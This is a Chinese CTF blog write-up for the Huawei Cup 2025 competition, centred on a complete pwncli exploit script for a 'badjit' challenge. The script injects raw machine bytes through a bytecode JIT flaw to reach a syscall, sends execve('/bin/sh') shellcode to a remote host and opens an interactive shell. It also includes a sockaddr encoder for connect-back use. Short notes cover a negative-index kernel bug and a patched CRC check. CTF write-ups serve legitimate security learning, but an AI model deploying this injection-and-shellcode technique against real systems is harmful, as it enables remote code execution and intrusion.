
华为杯-2025


华为杯 2025 WP

badjit

修改 rbx,然后 call offset

先构造好寄存器,然后直接syscall

#!/usr/bin/env python3
from pwncli import *

# context.terminal = ["tmux", "splitw", "-h", "-l", "130"]
# Debugger pane: open a Windows Terminal split that runs bash inside WSL.
context.terminal = ['cmd.exe', '/c', 'wt.exe', '-w', '0', 'sp', '-s', '0.6', '-d', '.', 'wsl.exe', 'bash', '-c']

# Run mode comes from the single optional CLI argument ("remote" / "nodbg");
# with no argument the flag stays 0 and the binary is started locally.
if len(sys.argv) == 2:
    local_flag = sys.argv[1]
else:
    local_flag = 0

elf_path = './badjit'
gift.elf = ELF(elf_path)

if local_flag == "remote":
    # "host:port"; the pattern also tolerates whitespace around the colon.
    addr = '192.168.18.29:10000'
    ip, port = re.split(r'[\s:]+', addr)
    gift.io = remote(ip, port)
else:
    gift.io = process(elf_path)

# Both "remote" and "nodbg" mark the session as not-debuggable; presumably
# launch_gdb() below consults this flag -- confirm against pwncli.
gift.remote = local_flag == "remote" or local_flag == "nodbg"
init_x64_context(gift.io, gift)
libc = load_libc()

# GDB script, one command per line (leading and trailing newline kept exactly
# as in the original triple-quoted literal): brva presumably breaks at the
# image-relative offset 0x1ABF7 (pwndbg/pwncli command, confirm), then
# continue and single-step.
cmd = "\n".join(["", "brva 0x1ABF7", "ida", "c", "si", ""])
launch_gdb(cmd)


class VM:
    """Assembler for the bytecode stream handed to the challenge's interpreter.

    Every emitter appends one encoded instruction to ``code`` and returns
    ``self`` so calls can be chained.  Encodings used by this script:

        0x00 r1 r2             add_reg      (one byte per register number)
        0x01 r1 r2             sub_reg
        0x03 r1 r2             cmp_reg
        0x80 r  imm32          add_imm      (little-endian 32-bit immediate)
        0x80 r  <raw bytes>    inj_code_add (operand bytes appended verbatim)
        0x81 r  <raw bytes>    inj_code_sub

    The ``inj_code_*`` variants perform no length check on ``code``; the
    caller is responsible for the operand length (this script passes four
    bytes).  Example: ``VM().add_reg(1, 2).get()`` yields the three bytes
    00 01 02, and ``VM().add_imm(1, 4).get()`` yields 80 01 04 00 00 00.
    """

    OP_ADD = b'\x00'
    OP_SUB = b'\x01'
    OP_CMP = b'\x03'
    OP_ADD_IMM = b'\x80'
    OP_SUB_IMM = b'\x81'

    def __init__(self):
        self.code = b""

    @staticmethod
    def _reg(reg):
        """Encode a register number as a single byte (raises if not 0..255)."""
        return struct.pack('<B', reg)

    def _emit(self, opcode, *operands):
        """Append ``opcode`` plus every operand chunk; return self for chaining."""
        self.code += opcode + b"".join(operands)
        return self

    def add_reg(self, reg1, reg2):
        """reg1 += reg2 (opcode 0x00)."""
        return self._emit(self.OP_ADD, self._reg(reg1), self._reg(reg2))

    def sub_reg(self, reg1, reg2):
        """reg1 -= reg2 (opcode 0x01)."""
        return self._emit(self.OP_SUB, self._reg(reg1), self._reg(reg2))

    def cmp_reg(self, reg1, reg2):
        """Compare reg1 with reg2 (opcode 0x03)."""
        return self._emit(self.OP_CMP, self._reg(reg1), self._reg(reg2))

    def add_imm(self, reg, imm):
        """reg += imm, with imm packed as an unsigned little-endian u32 (opcode 0x80)."""
        return self._emit(self.OP_ADD_IMM, self._reg(reg), struct.pack('<I', imm))

    def inj_code_add(self, reg, code):
        """Opcode 0x80 with ``code`` used verbatim as the operand bytes."""
        return self._emit(self.OP_ADD_IMM, self._reg(reg), code)

    def inj_code_sub(self, reg, code):
        """Opcode 0x81 with ``code`` used verbatim as the operand bytes."""
        return self._emit(self.OP_SUB_IMM, self._reg(reg), code)

    def get(self):
        """Return the accumulated bytecode."""
        return self.code


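def addr_to_hex(addr_str):
    """Encode an "ip:port" string as the 64-bit integer image of a sockaddr_in.

    Input format:  "172.18.11.18:11223"
    Output format: "0x120b12acd72b0002"

    The eight bytes are laid out as the kernel expects them -- sa_family
    (AF_INET = 2, host order), sin_port (network order), sin_addr (network
    order) -- and then read back as one little-endian quadword, so the value
    can be loaded into an x64 register with a single 64-bit immediate.

    Returns None (after printing the error) when the argument is not a valid
    "ip:port" pair: wrong shape, non-numeric or out-of-range port, or an
    address that inet_aton rejects.  Callers must check for None.
    """
    try:
        ip, port_str = addr_str.strip().split(':')
        port = int(port_str)
        # struct would reject this too, but say so explicitly rather than
        # relying on struct.error.
        if not 0 <= port <= 0xFFFF:
            raise ValueError(f"port out of range: {port}")

        # sockaddr_in prefix: sa_family(2) + sin_port(2) + sin_addr(4)
        data = struct.pack('<H', 2) + struct.pack('!H', port) + socket.inet_aton(ip)

        # Reinterpret the 8 bytes as a little-endian integer (x64 register image).
        val = struct.unpack('<Q', data)[0]
        return f'0x{val:016x}'
    except (ValueError, OSError, AttributeError) as e:
        # ValueError: bad split / int() / port range; OSError: inet_aton
        # rejected the address; AttributeError: argument is not a str.
        print(f"转换错误: {e}")
        return None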


# Assemble the bytecode program that is sent to the interpreter.  Register
# numbers and the encoding of each op come from the VM class above; the
# writeup's plan is "set up the registers first, then syscall directly".
vm = VM()
vm.add_reg(1, 2)
vm.add_reg(1, 2)
vm.add_reg(1, 2)
vm.add_reg(1, 2)
vm.add_reg(1, 2)
vm.sub_reg(0, 0)  # presumably reg0 -= reg0, i.e. zeroes it (same for 4, 5, 3 below)
vm.sub_reg(4, 4)
vm.sub_reg(5, 5)
vm.add_reg(5, 1)  # reg5 receives reg1 after the clear above
vm.sub_reg(3, 3)
# The 4 operand bytes are emitted verbatim (inj_code_add does not pack them);
# per the writeup this is where the program is meant to reach its syscall.
vm.inj_code_add(3, b'\x90\x90\x0f\x05')
# Commented-out variants left by the author (not sent):
# vm.inj_code_add(0, b'\x53\x5e\x89\xd2')
# vm.inj_code(0, b'\x31\xff\x31\xc0')
# vm.add_imm(1, 0x4)
payload = vm.get()

# Disabled earlier iteration; looks like an opcode sweep over 0x81..0xFE.
# payload = b''
# for i in range(0x81, 0xFF):
# payload += bytes.fromhex(f'{i:02x}01020304')

# Protocol: the target prompts for the length first, then for the code bytes.
# sla() sends after the 'length' prompt; the length goes as a str, which
# pwncli encodes for us.
sla(b'length', str(len(payload)))
sa(b'input code', payload)

# pause()
# Second stage, sent raw: 0x10 NOP bytes followed by pwncli's stock
# ShellcodeMall.amd64.execve_bin_sh blob.
s(b'\x90' * 0x10 + ShellcodeMall.amd64.execve_bin_sh)

# Hand the connection over to the terminal.
ia()

kernel_note

index 取负数导致溢出

somenote

fix

把 crc 校验处的 jmp 条件改反就能通过,绷不住了

渗透

渗透在吃屎,源码叫bin.zip,真就复现exp

华为之夜

今年没有平板了,今年只有增智慧水壶

好吃的

去玩了

  • 标题: 华为杯-2025
  • 作者: InkeyP
  • 创建于 : 2025-12-02 11:49:08
  • 更新于 : 2025-12-02 20:03:25
  • 链接: https://blog.inkey.top/202512/02/华为杯-2025/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。